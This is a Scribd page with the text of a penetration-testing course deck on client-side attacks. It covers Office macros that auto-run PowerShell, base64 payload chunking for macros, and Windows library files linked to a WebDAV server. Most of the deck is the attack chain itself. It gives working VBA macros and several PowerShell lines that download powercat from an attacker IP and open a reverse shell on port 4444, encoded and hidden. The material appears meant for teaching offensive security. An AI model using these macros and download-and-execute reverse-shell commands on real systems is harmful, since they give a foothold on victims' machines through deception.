Scribd
Upload
146 views20 pages

Client-Side Attack Techniques Guide

The document discusses various client-side attack techniques, including exploiting Microsoft Office applications using macros to execute malicious code, abusing Windows library files to gain an initial foothold, and using PowerShell to download payloads and establish a reverse shell connection back to the attacker. It provides code examples of using macros in Word and Excel to run PowerShell, splitting a base64 encoded string into chunks for use in a macro, and creating a Windows library file linked to a WebDAV server to deliver a second stage payload.

Uploaded by

B20DCAT088 Lưu Văn Hưng
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
146 views20 pages

Client-Side Attack Techniques Guide

The document discusses various client-side attack techniques, including exploiting Microsoft Office applications using macros to execute malicious code, abusing Windows library files to gain an initial foothold, and using PowerShell to download payloads and establish a reverse shell connection back to the attacker. It provides code examples of using macros in Word and Excel to run PowerShell, splitting a base64 encoded string into chunks for use in a macro, and creating a Windows library file linked to a WebDAV server to deliver a second stage payload.

Uploaded by

B20DCAT088 Lưu Văn Hưng
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd

Penetration Testing

Client-side Attacks
MITRE ATT&CK heat map
highlighting the top five techniques
CrowdStrike observed adversaries
use in each tactic area

From June 2022 to July 2023


Client-side Attacks

● Once they execute these files on their machine, we can get a foothold in the internal network.
● Client-side attacks often exploit weaknesses or functions in local software and applications such as
browsers, operating system components, or office programs.
● To execute malicious code on the client's system, we must often persuade, trick, or deceive the target
user.
Target Reconnaissance

● Target’s installed software


● OS
● Personal Information
● Device Fingerprinting

(grabify, Canarytoken , …)
Exploiting Microsoft Office

● Microsoft Office applications like Word and Excel allow users to embed macros
● Macros are one of the oldest and best-known client-side attack vectors
Exploiting Microsoft Office

Marco opening powershell.exe


Sub Test_Macro()

CreateObject("Wscript.Shell").Run "powershell"

End Sub
Exploiting Microsoft Office
Sub AutoOpen()

Test_Macro

End Sub

Sub Document_Open()

Test_Marcro

End Sub

Sub Test_Marcro()

CreateObject("Wscript.Shell").Run "powershell"

End Sub
Exploiting Microsoft Office
Sub Test_Marcro()

Dim Str As String

CreateObject("Wscript.Shell").Run Str

End Sub

Sử dụng powercat để tạo reverse shell

cp
/usr/share/powershellempire/empire/server/data/module_source/management
/powercat.ps1 .

IEX (New-Object
System.Net.Webclient).DownloadString("http://192.168.45.229/powercat.ps
1");powercat -c 192.168.45.229 -p 4444 -e powershell
Exploiting Microsoft Office
$Text = ‘IEX (New-Object
System.Net.Webclient).DownloadString("http://192.168.45.229/powercat.ps
1");powercat -c 192.168.45.229 -p 4444 -e powershell’

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText =[Convert]::ToBase64String($Bytes)

$EncodedText

powershell.exe -nop -w hidden -enc Str


Exploiting Microsoft Office
<Python script to split the base64-encoded string into smaller chunks
of 50 characters and concatenate them into the Str variable>

str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."

n = 50

for i in range(0, len(str), n):

print("Str = Str + " + '"' + str[i:i+n] + '"')


Abusing Windows Library Files

● Windows library files are virtual containers for user content. They connect users
with data stored in remote locations like web services or shares
● Two-stage client-side attack
○ Use Windows library files to gain a foothold on the target system and set up the second
stage
○ Use the foothold to provide an executable file that will start a reverse shell when double-
clicked.
The first stage
● Create a Windows library file connecting to a WebDAV share server
apt install python3-wsgidav
● Run WebDAV server
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
● Create file and test.
The first stage
● Create Windows Library file

XML and Library Description Version:

<?xml version="1.0" encoding="UTF-8"?>


<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">

</libraryDescription>

Name and Version Tags of the Library:


<name>@windows.storage.dll,-34582</name>
<version>6</version>
The first stage
Configuration for Navigation Bar Pinning and Icon:

<isLibraryPinned>true</isLibraryPinned>

<iconReference>imageres.dll,-1003</iconReference>

templateInfo and folderType tags:

<templateInfo>

<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>

</templateInfo>
The first stage
templateInfo and folderType tags:
<searchConnectorDescriptionList>

<searchConnectorDescription>

<isDefaultSaveLocation>true</isDefaultSaveLocation>

<isSupported>false</isSupported>

<simpleLocation>

<url>http://192.168.211.129</url>

</simpleLocation>

</searchConnectorDescription>

</searchConnectorDescriptionList>
The second stage
Powershell Download and Powercat reverse shell:

powershell.exe -c "IEX(New-Object
System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat
.ps1');
powercat -c 192.168.211.129 -p 4444 -e powershell"
Use-case: APT targets Vietnam government

You might also like